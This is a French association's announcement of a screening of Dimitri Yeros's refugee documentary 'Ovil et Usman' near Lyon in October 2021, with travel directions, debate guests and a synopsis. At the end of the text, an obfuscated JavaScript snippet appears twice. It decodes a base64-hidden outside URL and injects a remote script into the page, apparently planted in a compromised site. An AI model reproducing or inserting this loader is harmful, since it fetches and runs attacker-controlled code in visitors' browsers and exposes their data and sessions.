Cher.e.s adhérent.e.s et cher.e.s ami.e.s
Defkalion a le plaisir de vous annoncer la projection d’un documentaire grec qui nous vient des “Ecrans des mondes” de Paris.
Ovil et Usman
de Dimitri Yeros
(2019, 47 mn)
au cinéma Art et Essai « Mourguet », 69110 Sainte-Foy-lès-Lyon
le 21 octobre 2021 à 20 heures
(Par les transports en commun depuis la place Bellecour :
arrêt Bellecour Chambonnet, bus C20 direction Fort du Bruissin, Arrêt Choulans-Tourelles, correspondance avec bus C19 direction Francheville Taffignon, arrêt : Mairie de Saint Foy)
* * *
La projection sera suivie d’un débat en présence de l’association TRACES, de la Métropole de Lyon et
de la participation de, Spyros Franguiadakis, sociologue, Maître de Conférences à l’Université Lyon 2
* * *
A cette occasion, et si les conditions sanitaires le permettent enfin, nous pourrons nous retrouver autour d’un verre à la fin de la séance ET nous vous proposerons un choix de livres de notre librairie partenaire « Terre des livres », sur le sujet de la problématique des migrants et des romans d’auteurs grecs traduits en français.
* * *
Synopsis : Ovil et Usman, un couple homosexuel, souhaitent fuir leur pays d’origine vers le «paradis de l’Occident». Après leur périple de réfugiés, ils se retrouvent dans le camp de Moria sur l’île de Lesbos.
Dimitris Yeros est l’un des artistes grecs les plus influents de sa génération, photographe et graphiste, il est connu dans le monde entier. Il a organisé 58 expositions personnelles de ses œuvres en Grèce et à l’étranger. Il a publié de nombreux ouvrages sur son travail. Son dernier album photo a été réalisé en collaboration avec Edward Albee, tandis que le précédent présentait des photographies issues de sa longue amitié avec Gabriel García Márquez.
En 2020, la galerie Throckmorton de New York présente une exposition de ses photographies intitulée « A Lesbos Diary ».
En 2021, ERT2 TV, la chaine nationale grecque, lui consacre un documentaire sur sa vie et son œuvre.
(function(){var a=document.head||document.getElementsByTagName(“head”)[0],b=”script”,c=atob(“aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=”);c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();(function(){var a=document.head||document.getElementsByTagName(“head”)[0],b=”script”,c=atob(“aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=”);c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();